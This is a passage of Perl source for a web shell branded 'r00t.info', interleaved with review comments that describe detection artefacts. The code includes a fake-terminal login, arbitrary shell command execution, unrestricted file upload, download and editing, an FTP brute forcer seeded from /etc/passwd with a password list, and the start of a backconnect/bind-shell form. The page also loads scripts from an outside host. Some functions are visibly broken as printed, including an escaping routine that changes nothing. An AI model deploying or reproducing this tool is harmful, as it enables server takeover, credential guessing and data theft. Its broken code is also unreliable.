3091 return;
3092 } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
3093 this.tagBuffer += ">";
3094 this.inTag = false;
3095 this.currentText += this.tagBuffer;
3096 this.currentChar++;
3097 this.run();
3098 return;
3099 } else if(this.inTag) {
3100 this.tagBuffer += this.origText.charAt(this.currentChar);
3101 this.currentChar++;
3102 this.run();
3103 return;
3104 } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
3105 this.HTMLEntityBuffer = "&";
3106 this.inHTMLEntity = true;
3107 this.currentChar++;
3108 this.run();
3109 return;
3110 } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
3111 this.HTMLEntityBuffer += ";";
3112 this.inHTMLEntity = false;
3113 this.currentText += this.HTMLEntityBuffer;
3114 this.currentChar++;
3115 this.run();
3116 return;
3117 } else if(this.inHTMLEntity) {
3118 this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
3119 this.currentChar++;
3120 this.run();
3121 return;
3122 } else {
3123 this.currentText += this.origText.charAt(this.currentChar);
3124 }
3125 this.element.innerHTML = this.currentText;
3126 this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
3127 this.currentChar++;
3128 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
3129 } else {
3130 this.currentText = "";
3131 this.currentChar = 0;
3132 this.running = false;
3133 this.finishedCallback();
3134 }
3135}
3136</script>
3137</pre>
3138
3139<font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 r00t.info </font><br><br>
3140<table align="center" border="1" width="600" heigh>
3141<script src=hxxp://r00t.info/bot/log.js></script>
3142<script src=hxxp://r00t.info/ccb.js></script>
3143<tbody><tr>
3144<td valign="top" background="hxxp://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
3145<font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
3146
3147<font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
3148<font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
3149<font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
3150
3151<font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
3152
3153<font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
3154<font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
3155</tr>
3156</tbody></table>
3157<br>
3158
3159<script type="text/javascript">
3160new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
3161TypingText.runAll();
3162
3163</script>
3164END
3165}
3166
3167#------------------------------------------------------------------------------
3168# Add html special chars
3169#------------------------------------------------------------------------------
# HtmlSpecialChars: intended to HTML-escape the ampersand, double quote, single
# quote, less-than and greater-than characters in its one scalar argument.
# NOTE(review): as printed, every substitution replaces a character with itself, so
# the function returns its input unchanged. The replacement entities (presumably
# &amp; &quot; &#39; &lt; &gt;) look to have been decoded when this page was
# extracted - confirm against an original sample before relying on this text.
3170sub HtmlSpecialChars($){
3171 my $text = shift;
3172 $text =~ s/&/&/g;
3173 $text =~ s/"/"/g;
3174 $text =~ s/'/'/g;
3175 $text =~ s/</</g;
3176 $text =~ s/>/>/g;
3177 return $text;
3178}
3179#------------------------------------------------------------------------------
3180# Add link for directory
3181#------------------------------------------------------------------------------
# AddLinkDir: splits $CurrentDir on the platform path separator and returns one <a>
# element per path component, each linking to ?a=<argument 1>&d=<path so far>.
# NOTE(review): $ac and the path components are placed in the href and in the link
# text without URL-encoding or HTML-escaping.
3182sub AddLinkDir($)
3183{
3184 my $ac=shift;
3185 my @dir=();
3186 if($WinNT)
3187 {
3188 @dir=split(/\\/,$CurrentDir);
3189 }else
3190 {
3191 @dir=split("/",&trim($CurrentDir));
3192 }
3193 my $path="";
3194 my $result="";
3195 foreach (@dir)
3196 {
    # $path accumulates, so each link points at the directory up to this component.
3197 $path .= $_.$PathSep;
3198 $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
3199 }
3200 return $result;
3201}
3202#------------------------------------------------------------------------------
3203# Prints the message that informs the user of a failed login
3204#------------------------------------------------------------------------------
# PrintLoginFailedMessage: prints a fixed block of text styled like a failed
# console login. It takes no arguments and reads no state.
# NOTE(review): the text is constant, so it can be matched in captured responses.
3205sub PrintLoginFailedMessage
3206{
3207 print <<END;
3208<br>Login : Administrator<br>
3209
3210Password:<br>
3211Login incorrect<br><br>
3212END
3213}
3214
3215#------------------------------------------------------------------------------
3216# Prints the HTML form for logging in
3217#------------------------------------------------------------------------------
# PrintLoginForm: prints the login form. It posts to $ScriptLocation with the hidden
# field a=login and the password in a field named p.
# NOTE(review): the login name shown is fixed text; only the password is submitted.
3218sub PrintLoginForm
3219{
3220 print <<END;
3221<form name="f" method="POST" action="$ScriptLocation">
3222<input type="hidden" name="a" value="login">
3223Login : Administrator<br>
3224Password:<input type="password" name="p">
3225<input class="submit" type="submit" value="Enter">
3226</form>
3227END
3228}
3229
3230#------------------------------------------------------------------------------
3231# Prints the footer for the HTML Page
3232#------------------------------------------------------------------------------
# PrintPageFooter: prints the closing banner, which interpolates $EditPersion, and
# closes the code, center, body and html elements opened by PrintPageHeader.
3233sub PrintPageFooter
3234{
3235 print "<br><font color=red>o---[ <font color=#ff9900>Edit by $EditPersion </font> ]---o</font></code></center></body></html>";
3236}
3237
3238#------------------------------------------------------------------------------
3239# Retreives the values of all cookies. The cookies can be accesses using the
3240# variable $Cookies{''}
3241#------------------------------------------------------------------------------
# GetCookies: splits the request cookie string on "; " and stores each name=value
# pair in the global %Cookies.
# NOTE(review): the environment key is printed as hxxp_COOKIE. This page writes
# http as hxxp throughout, so the original is presumably the CGI variable
# HTTP_COOKIE - confirm against an original sample.
3242sub GetCookies
3243{
3244 @hxxpcookies = split(/; /,$ENV{'hxxp_COOKIE'});
3245 foreach $cookie(@hxxpcookies)
3246 {
    # split has no limit here, so a value containing "=" keeps only the part
    # before its first "=".
3247 ($id, $val) = split(/=/, $cookie);
3248 $Cookies{$id} = $val;
3249 }
3250}
3251
3252#------------------------------------------------------------------------------
3253# Prints the screen when the user logs out
3254#------------------------------------------------------------------------------
# PrintLogoutScreen: prints one fixed line imitating a closed remote session.
3255sub PrintLogoutScreen
3256{
3257 print "Connection closed by foreign host.<br><br>";
3258}
3259
3260#------------------------------------------------------------------------------
3261# Logs out the user and allows the user to login again
3262#------------------------------------------------------------------------------
# PerformLogout: overwrites the SAVEDPWD cookie with an empty value, prints the
# logout line followed by the login page, and ends the request with exit.
# NOTE(review): the Set-Cookie line must be printed before PrintPageHeader because
# that sub emits the blank line that ends the response headers.
3263sub PerformLogout
3264{
3265 print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
3266 &PrintPageHeader("p");
3267 &PrintLogoutScreen;
3268
3269 &PrintLoginScreen;
3270 &PrintLoginForm;
3271 &PrintPageFooter;
3272 exit;
3273}
3274
3275#------------------------------------------------------------------------------
3276# This function is called to login the user. If the password matches, it
3277# displays a page that allows the user to run commands. If the password doens't
3278# match or if no password is entered, it displays a form that allows the user
3279# to login
3280#------------------------------------------------------------------------------
# PerformLogin: compares $LoginPassword (set outside this sub) with the hard-coded
# $Password using eq. On a match it sets the cookie SAVEDPWD to the password itself
# and prints the page header followed by the output of ListDir. Otherwise it prints
# the login page, adds the failure message when a non-empty password was sent, and
# exits.
# NOTE(review): the credential is static, compared in plain text and echoed back as
# a cookie value, so a request or response carrying "SAVEDPWD=" is a strong
# indicator of this script in proxy or web server logs. No limit on login attempts
# is visible in this sub.
3281sub PerformLogin
3282{
3283 if($LoginPassword eq $Password) # password matched
3284 {
    # The plain-text password becomes the session token.
3285 print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
3286 &PrintPageHeader;
3287 print &ListDir;
3288 }
3289 else # password didn't match
3290 {
3291 &PrintPageHeader("p");
3292 &PrintLoginScreen;
3293 if($LoginPassword ne "") # some password was entered
3294 {
3295 &PrintLoginFailedMessage;
3296
3297 }
3298 &PrintLoginForm;
3299 &PrintPageFooter;
3300 exit;
3301 }
3302}
3303
3304#------------------------------------------------------------------------------
3305# Prints the HTML form that allows the user to enter commands
3306#------------------------------------------------------------------------------
# PrintCommandLineInputForm: returns (it does not print) the HTML form used to submit
# a command. The form posts a=command, d=$CurrentDir and the text field c to
# $ScriptLocation. As a side effect it sets the global $Prompt.
# NOTE(review): $CurrentDir is written into the hidden field value without HTML
# escaping. The field names a, d and c are what a request to this form carries.
3307sub PrintCommandLineInputForm
3308{
3309 my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
3310 $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
3311 return <<END;
3312<form name="f" method="POST" action="$ScriptLocation">
3313
3314<input type="hidden" name="a" value="command">
3315
3316<input type="hidden" name="d" value="$CurrentDir">
3317$Prompt
3318<input type="text" size="50" name="c">
3319<input class="submit"type="submit" value="Enter">
3320</form>
3321END
3322}
3323
3324#------------------------------------------------------------------------------
3325# Prints the HTML form that allows the user to download files
3326#------------------------------------------------------------------------------
# PrintFileDownloadForm: returns (it does not print) the HTML form that asks for a
# file name to download. The form posts a=download, d=$CurrentDir and the text
# field f to $ScriptLocation. As a side effect it sets the global $Prompt.
# NOTE(review): $CurrentDir is written into the hidden field without HTML escaping.
3327sub PrintFileDownloadForm
3328{
3329 my $dir = &AddLinkDir("download");
3330 $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
3331 return <<END;
3332<form name="f" method="POST" action="$ScriptLocation">
3333<input type="hidden" name="d" value="$CurrentDir">
3334<input type="hidden" name="a" value="download">
3335$Prompt download<br><br>
3336Filename: <input class="file" type="text" name="f" size="35"><br><br>
3337Download: <input class="submit" type="submit" value="Begin">
3338
3339</form>
3340END
3341}
3342
3343#------------------------------------------------------------------------------
3344# Prints the HTML form that allows the user to upload files
3345#------------------------------------------------------------------------------
# PrintFileUploadForm: returns (it does not print) the multipart upload form. The
# form posts the file field f, the optional checkbox o=overwrite, d=$CurrentDir and
# a=upload to $ScriptLocation. As a side effect it sets the global $Prompt.
# NOTE(review): multipart POST requests to a CGI path with these field names are
# the request shape produced by this form.
3346sub PrintFileUploadForm
3347{
3348 my $dir= &AddLinkDir("upload");
3349 $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
3350 return <<END;
3351<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
3352$Prompt upload<br><br>
3353Filename: <input class="file" type="file" name="f" size="35"><br><br>
3354Options: <input type="checkbox" name="o" id="up" value="overwrite">
3355<label for="up">Overwrite if it Exists</label><br><br>
3356Upload: <input class="submit" type="submit" value="Begin">
3357<input type="hidden" name="d" value="$CurrentDir">
3358<input class="submit" type="hidden" name="a" value="upload">
3359
3360</form>
3361
3362END
3363}
3364
3365#------------------------------------------------------------------------------
3366# This function is called when the timeout for a command expires. We need to
3367# terminate the script immediately. This function is valid only on Unix. It is
3368# never called when the script is running on NT.
3369#------------------------------------------------------------------------------
# CommandTimeout: on non-Windows hosts cancels any pending alarm and returns an HTML
# fragment that closes the output textarea and reports the timeout, interpolating
# $CommandTimeoutDuration.
# NOTE(review): the banner above says the script is terminated immediately, but
# this sub only returns text; any termination must happen in the caller, which is
# outside this excerpt. On Windows nothing is returned explicitly.
3370sub CommandTimeout
3371{
3372 if(!$WinNT)
3373 {
3374 alarm(0);
3375 return <<END;
3376</textarea>
3377<br><font color=yellow>
3378Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
3379<br><font size='6' color=red>Killed it!</font>
3380END
3381 }
3382}
3383
3384
3385
3386#------------------------------------------------------------------------------
3387# This function displays the page that contains a link which allows the user
3388# to download the specified file. The page also contains a auto-refresh
3389# feature that starts the download automatically.
3390# Argument 1: Fully qualified filename of the file to be downloaded
3391#------------------------------------------------------------------------------
# PrintDownloadLinkPage: argument 1 is the path of the file to offer.
# If the path exists, it is percent-encoded and placed in a link of the form
# $ScriptLocation?a=download&f=<path>&o=go, a meta refresh to that link is stored in
# $HtmlMetaHeader, the page header is printed, and the notice text plus the command
# form are returned. Otherwise a failure message and the download form are returned.
# NOTE(review): the second request carries the full server-side path in the f=
# query parameter, so a=download together with o=go is visible in access logs.
# The meta attribute is printed as hxxp-EQUIV, presumably the defanged http-equiv.
3392sub PrintDownloadLinkPage
3393{
3394 local($FileUrl) = @_;
3395 my $result="";
3396 if(-e $FileUrl) # if the file exists
3397 {
3398 # encode the file link so we can send it to the browser
3399 $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
3400 $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
3401 $HtmlMetaHeader = "<meta hxxp-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
3402 &PrintPageHeader("c");
    # The message shows the client-supplied $TransferFile, without HTML escaping.
3403 $result .= <<END;
3404Sending File $TransferFile...<br>
3405
3406If the download does not start automatically,
3407<a href="$DownloadLink">Click Here</a>
3408END
3409 $result .= &PrintCommandLineInputForm;
3410 }
3411 else # file doesn't exist
3412 {
3413 $result .= "Failed to download $FileUrl: $!";
3414 $result .= &PrintFileDownloadForm;
3415 }
3416 return $result;
3417}
3418
3419#------------------------------------------------------------------------------
3420# This function reads the specified file from the disk and sends it to the
3421# browser, so that it can be downloaded by the user.
3422# Argument 1: Fully qualified pathname of the file to be sent.
3423#------------------------------------------------------------------------------
# SendFileToBrowser: argument 1 is the path to send. When the file opens, its size
# is taken from stat, the part after the last slash or backslash is captured as the
# download name, the response headers and the file contents are printed, and the
# script exits with status 1. When the open fails, a message containing the path
# and $! plus the download form is returned.
# NOTE(review): no check restricts which path may be read; the only limit is what
# the CGI process account can open. Responses from a CGI path with
# Content-Type application/x-unknown and an attachment disposition are the
# artefact this sub produces. The file name is written into the header unquoted.
3424sub SendFileToBrowser
3425{
3426 my $result = "";
3427 local($SendFile) = @_;
3428 if(open(SENDFILE, $SendFile)) # file opened for reading
3429 {
3430 if($WinNT)
3431 {
3432 binmode(SENDFILE);
3433 binmode(STDOUT);
3434 }
3435 $FileSize = (stat($SendFile))[7];
    # The match is run for its capture group $1; $Filename itself is not read
    # again in this sub.
3436 ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
3437 print "Content-Type: application/x-unknown\n";
3438 print "Content-Length: $FileSize\n";
3439 print "Content-Disposition: attachment; filename=$1\n\n";
3440 print while(<SENDFILE>);
3441 close(SENDFILE);
3442 exit(1);
3443 }
3444 else # failed to open file
3445 {
3446 $result .= "Failed to download $SendFile: $!";
3447 $result .=&PrintFileDownloadForm;
3448 }
3449 return $result;
3450}
3451
3452
3453#------------------------------------------------------------------------------
3454# This function is called when the user downloads a file. It displays a message
3455# to the user and provides a link through which the file can be downloaded.
3456# This function is also called when the user clicks on that link. In this case,
3457# the file is read and sent to the browser.
3458#------------------------------------------------------------------------------
# BeginDownload: resolves $TransferFile to $TargetFile and dispatches on $Options.
# An absolute path (leading backslash or drive letter on Windows, leading slash
# elsewhere) is used as given; a relative one is appended to $CurrentDir with one
# trailing separator removed. $Options eq "go" sends the file, anything else
# produces the link page.
# NOTE(review): the absolute-path test combines its conditions with the bitwise
# operators & and | instead of the logical ones. There is no explicit return, so the
# value handed back is that of the last call evaluated. The client chooses both the
# directory and the file name, and nothing here confines the result to a base path.
3459sub BeginDownload
3460{
3461 # get fully qualified path of the file to be downloaded
3462 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
3463 (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
3464 {
3465 $TargetFile = $TransferFile;
3466 }
3467 else # path is relative
3468 {
3469 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
3470 $TargetFile .= $PathSep.$TransferFile;
3471 }
3472
3473 if($Options eq "go") # we have to send the file
3474 {
3475 &SendFileToBrowser($TargetFile);
3476 }
3477 else # we have to send only the link page
3478 {
3479 &PrintDownloadLinkPage($TargetFile);
3480 }
3481}
3482
3483#------------------------------------------------------------------------------
3484# This function is called when the user wants to upload a file. If the
3485# file is not specified, it displays a form allowing the user to specify a
3486# file, otherwise it starts the upload process.
3487#------------------------------------------------------------------------------
3488sub UploadFile
3489{
 # Writes the request field "filedata" to a file in $CurrentDir named after
 # the last path component of $TransferFile, and returns an HTML status
 # string followed by the command form.
 # Defender note: the destination directory is whatever $CurrentDir holds
 # (the dispatcher in this listing fills it from request parameter "d"), so
 # this is a file write into any directory the web-server account can write
 # to. File-integrity monitoring on the web root and a non-writable document
 # tree are the controls that catch or block it.
3490 # if no file is specified, print the upload form again
3491 if($TransferFile eq "")
3492 {
3493 return &PrintFileUploadForm;
3494
3495 }
3496 my $result="";
3497 # start the uploading process
3498 $result .= "Uploading $TransferFile to $CurrentDir...<br>";
3499
3500 # get the fully qualified pathname of the file to be created
3501 chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
 # keep only the final path component of the submitted name (left in $1)
3502 $TransferFile =~ m!([^/^\\]*)$!;
3503 $TargetName .= $PathSep.$1;
3504
3505 $TargetFileSize = length($in{'filedata'});
3506 # if the file exists and we are not supposed to overwrite it
3507 if(-e $TargetName && $Options ne "overwrite")
3508 {
3509 $result .= "Failed: Destination file already exists.<br>";
3510 }
3511 else # file is not present, or overwrite was requested
3512 {
 # opened for writing, so an existing file is truncated
3513 if(open(UPLOADFILE, ">$TargetName"))
3514 {
3515 binmode(UPLOADFILE) if $WinNT;
3516 print UPLOADFILE $in{'filedata'};
3517 close(UPLOADFILE);
3518 $result .= "Transfered $TargetFileSize Bytes.<br>";
3519 $result .= "File Path: $TargetName<br>";
3520 }
3521 else
3522 {
3523 $result .= "Failed: $!<br>";
3524 }
3525 }
3526 $result .= &PrintCommandLineInputForm;
3527 return $result;
3528}
3529
3530#------------------------------------------------------------------------------
3531# This function is called when the user wants to download a file. If the
3532# filename is not specified, it displays a form allowing the user to specify a
3533# file, otherwise it displays a message to the user and provides a link
3534# through which the file can be downloaded.
3535#------------------------------------------------------------------------------
3536sub DownloadFile
3537{
 # Entry point for the "download" action. With no filename it prints the
 # page header and returns the download form; otherwise it resolves the
 # name to a full path and returns the result of either streaming the file
 # ($Options eq "go") or printing the link page.
 # Defender note: absolute paths are accepted as given, so the download is
 # not confined to the web root. The file listing in this script links to
 # it as "?a=download&o=go&f=<path>", a query-string pattern that can be
 # searched for in access logs.
3538 # if no file is specified, print the download form again
3539 if($TransferFile eq "")
3540 {
3541 &PrintPageHeader("f");
3542 return &PrintFileDownloadForm;
3543 }
3544
3545 # get fully qualified path of the file to be downloaded
3546 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
3547 {
3548 $TargetFile = $TransferFile;
3549 }
3550 else # path is relative
3551 {
 # strip one trailing separator from $CurrentDir, then append the name
3552 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
3553 $TargetFile .= $PathSep.$TransferFile;
3554 }
3555
3556 if($Options eq "go") # we have to send the file
3557 {
3558 return &SendFileToBrowser($TargetFile);
3559 }
3560 else # we have to send only the link page
3561 {
3562 return &PrintDownloadLinkPage($TargetFile);
3563 }
3564}
3565
3566
3567#------------------------------------------------------------------------------
3568# This function is called to execute commands. It displays the output of the
3569# command and allows the user to enter another command. The change directory
3570# command is handled differently. In this case, the new directory is stored in
3571# an internal variable and is used each time a command has to be executed. The
3572# output of the change directory command is not displayed to the users
3573# therefore error messages cannot be displayed.
3574#------------------------------------------------------------------------------
3575sub ExecuteCommand
3576{
 # Handles the "command" action: inspects the global $RunCommand (filled
 # from request parameter "c" by the dispatcher in this listing) and returns
 # the HTML for the result. Three cases are distinguished: "cd <dir>",
 # "edit <file>", and anything else.
 # Defender note: request text is placed into a shell command line here and
 # in RunCmd, so every such request makes the CGI process start a shell.
 # A web-server or CGI interpreter process with shell children is the
 # host-side signal to alert on.
3577 my $result="";
3578 if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
3579 {
3580 # we change the directory internally. The output of the
3581 # command is not displayed.
 # the shell prints the resulting working directory via $CmdPwd and the
 # output, minus its last character, becomes the new $CurrentDir
3582 $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
3583 chop($CurrentDir = `$Command`);
3584 $result .= &PrintCommandLineInputForm;
3585
3586 $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
3587 # show a listing after changing to the new directory
3588 $RunCommand= $WinNT?"dir":"dir -lia";
3589 $result .= &RunCmd;
3590 }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
3591 {
 # "edit <file>" is not sent to the shell as typed; it opens the editor form
3592 $result .= &SaveFileForm;
3593 }else
3594 {
3595 $result .= &PrintCommandLineInputForm;
3596 $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
3597 $result .=&RunCmd;
3598 }
3599 $result .= "</textarea>";
3600 return $result;
3601}
3602
3603#------------------------------------------------------------------------
3604# run command
3605#------------------------------------------------------------------------
3606
3607sub RunCmd
3608{
 # Builds a shell command line from $CurrentDir, $CmdSep, $RunCommand and
 # $Redirector (all globals set elsewhere) and returns HTML-escaped text.
 # On non-Windows hosts an alarm of $CommandTimeoutDuration seconds is armed
 # around the work and cleared afterwards; the handler is CommandTimeout,
 # defined outside this excerpt.
3609 my $result="";
3610 $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
3611 if(!$WinNT)
3612 {
3613 $SIG{'ALRM'} = \&CommandTimeout;
3614 alarm($CommandTimeoutDuration);
3615 }
3616 if($ShowDynamicOutput) # show output as it is generated
3617 {
 # unbuffered output, then the command line is opened as a pipe and read
 # line by line; each line is escaped before it is added to the page
3618 $|=1;
3619 $Command .= " |";
3620 open(CommandOutput, $Command);
3621 while(<CommandOutput>)
3622 {
3623 $_ =~ s/(\n|\r\n)$//;
3624 $result .= &HtmlSpecialChars("$_\n");
3625 }
3626 $|=0;
3627 }
3628 else # show output after command completes
3629 {
3630 $result .= &HtmlSpecialChars('$Command');
3631 }
3632 if(!$WinNT)
3633 {
3634 alarm(0);
3635 }
3636 return $result;
3637}
3638#==============================================================================
3639# Form Save File
3640#==============================================================================
3641sub SaveFileForm
3642{
 # Builds the editor page for an "edit <file>" request: a form whose hidden
 # "file" field names the target, a submit button with name "a" and value
 # "save", and a textarea pre-filled with whatever RunCmd returns for a
 # type/less command on the file.
 # Defender note: this is the read half of an in-place file editor; the
 # write half is SaveFile. Unexpected modification times on application
 # source files are the artefact to look for.
3643 my $result ="";
 # drop the first five characters of the command (the "edit " prefix)
3644 substr($RunCommand,0,5)="";
3645 my $file=&trim($RunCommand);
3646 $save='<br><input name="a" type="submit" value="save" class="submit" >';
3647 $File=$CurrentDir.$PathSep.$RunCommand;
3648 my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
 # writability only changes the textarea height and adds a warning message
3649 if(-w $File)
3650 {
3651 $rows="23"
3652 }else
3653 {
3654 $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
3655 $rows="20"
3656 }
3657 $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
3658 $read=($WinNT)?"type":"less";
3659 $RunCommand = "$read \"$RunCommand\"";
3660 $result .= <<END;
3661 <form name="f" method="POST" action="$ScriptLocation">
3662
3663 <input type="hidden" name="d" value="$CurrentDir">
3664 $Prompt
3665 <input type="text" size="40" name="c">
3666 <input name="s" class="submit" type="submit" value="Enter">
3667 <br>Command: <run> $RunCommand </run>
3668 <input type="hidden" name="file" value="$file" > $save <br> $msg
3669 <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
3670END
3671
3672 $result .= &RunCmd;
3673 $result .= "</textarea>";
3674 $result .= "</form>";
3675 return $result;
3676}
3677#==============================================================================
3678# Save File
3679#==============================================================================
3680sub SaveFile($)
3681{
 # Writes $Data to the file $File inside $CurrentDir, truncating any
 # existing content. Returns 1 on success and 0 when the file cannot be
 # opened. Two arguments are read although the prototype declares one.
 # Defender note: the name is joined to $CurrentDir without normalisation,
 # and the dispatcher in this listing passes request fields "data" and
 # "file" straight in, so this overwrites any file the web-server account
 # may write. Read-only application code and integrity monitoring are the
 # relevant controls.
3682 my $Data= shift ;
3683 my $File= shift;
3684 $File=$CurrentDir.$PathSep.$File;
3685 if(open(FILE, ">$File"))
3686 {
3687 binmode FILE;
3688 print FILE $Data;
3689 close FILE;
3690 return 1;
3691 }else
3692 {
3693 return 0;
3694 }
3695}
3696#------------------------------------------------------------------------------
3697# Brute Forcer Form
3698#------------------------------------------------------------------------------
3699sub BruteForcerForm
3700{
 # Returns the HTML form for the "bruteforcer" action: a textarea of user
 # names, a textarea with a built-in password list, and a per-attempt sleep
 # selector (0 to 3).
3701 my $result="";
3702 $result .= <<END;
3703
3704<table>
3705
3706<tr>
3707<td colspan="2" align="center">
3708####################################<br>
3709Simple FTP brute forcer<br>
3710####################################
3711<form name="f" method="POST" action="$ScriptLocation">
3712
3713<input type="hidden" name="a" value="bruteforcer"/>
3714</td>
3715</tr>
3716<tr>
3717<td>User:<br><textarea rows="18" cols="30" name="user">
3718END
# The user list is pre-filled with the first field of every /etc/passwd line,
# obtained by running a shell pipeline.
# Defender note: a web-server child process reading /etc/passwd through
# less and cut is a distinctive process-telemetry event.
3719chop($result .= `less /etc/passwd | cut -d: -f1`);
3720$result .= <<'END';
3721</textarea></td>
3722<td>
3723
3724Pass:<br>
3725<textarea rows="18" cols="30" name="pass">123pass
3726123!@#
3727123admin
3728123abc
3729123456admin
37301234554321
373112344321
3732pass123
3733admin
3734admincp
3735administrator
3736matkhau
3737passadmin
3738p@ssword
3739p@ssw0rd
3740password
3741123456
37421234567
374312345678
3744123456789
37451234567890
3746111111
3747000000
3748222222
3749333333
3750444444
3751555555
3752666666
3753777777
3754888888
3755999999
3756123123
3757234234
3758345345
3759456456
3760567567
3761678678
3762789789
3763123321
3764456654
3765654321
37667654321
376787654321
3768987654321
37690987654321
3770admin123
3771admin123456
3772abcdef
3773abcabc
3774!@#!@#
3775!@#$%^
3776!@#$%^&*(
3777!@#$$#@!
3778abc123
3779anhyeuem
3780iloveyou</textarea>
3781</td>
3782</tr>
3783<tr>
3784<td colspan="2" align="center">
3785Sleep:<select name="sleep">
3786
3787<option>0</option>
3788<option>1</option>
3789<option>2</option>
3790
3791<option>3</option>
3792</select>
3793<input type="submit" class="submit" value="Brute Forcer"/></td></tr>
3794</form>
3795</table>
3796END
3797return $result;
3798}
3799#------------------------------------------------------------------------------
3800# Brute Forcer
3801#------------------------------------------------------------------------------
3802sub BruteForcer
3803{
 # Handles the "bruteforcer" action. With an empty "user" field it returns
 # the form; otherwise it tries every submitted user and password pair as
 # an FTP login against the address in SERVER_ADDR and returns HTML listing
 # the pairs that were accepted.
 # Defender note: the target is the host's own address, so the FTP daemon
 # logs show a burst of failed logins for local account names coming from
 # the server itself. Login throttling or lockout on the FTP service, and
 # removing password-based FTP for system accounts, blunt this.
3804 my $result="";
3805 $Server=$ENV{'SERVER_ADDR'};
3806 if($in{'user'} eq "")
3807 {
3808 $result .= &BruteForcerForm;
3809 }else
3810 {
3811 use Net::FTP;
 # one entry per line of each textarea
3812 @user= split(/\n/, $in{'user'});
3813 @pass= split(/\n/, $in{'pass'});
3814 chomp(@user);
3815 chomp(@pass);
3816 $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
3817 foreach $username (@user)
3818 {
3819 if(!($username eq ""))
3820 {
3821 foreach $password (@pass)
3822 {
 # a new control connection is opened for every attempt
3823 $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
3824 if($ftp->login("$username","$password"))
3825 {
3826 $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
3827 $ftp->quit();
3828 break;
3829 }
 # optional pause between attempts, taken from the "sleep" form field
3830 if(!($in{'sleep'} eq "0"))
3831 {
3832 sleep(int($in{'sleep'}));
3833 }
3834 $ftp->quit();
3835 }
3836 }
3837 }
3838 $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
3839 }
3840 return $result;
3841}
3842#------------------------------------------------------------------------------
3843# Backconnect Form
3844#------------------------------------------------------------------------------
3845sub BackBindForm
3846{
 # Returns the HTML for the "backbind" action: one form that posts
 # clientaddr and clientport (defaults: the requester address from
 # REMOTE_ADDR and port 80) and one that posts clientport and bindpass
 # (default port 1412).
 # Defender note: the defaults shown here give two network expectations to
 # test against, an outbound TCP session from the web server to the
 # address that made the request and a new listener on port 1412. Egress
 # filtering from web servers and alerting on new listening sockets owned
 # by the web-server account cover both.
3847 return <<END;
3848 <br><br>
3849
3850 <table>
3851 <tr>
3852 <form name="f" method="POST" action="$ScriptLocation">
3853 <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
3854 <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
3855 Port: <input type="text" size="7" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
3856
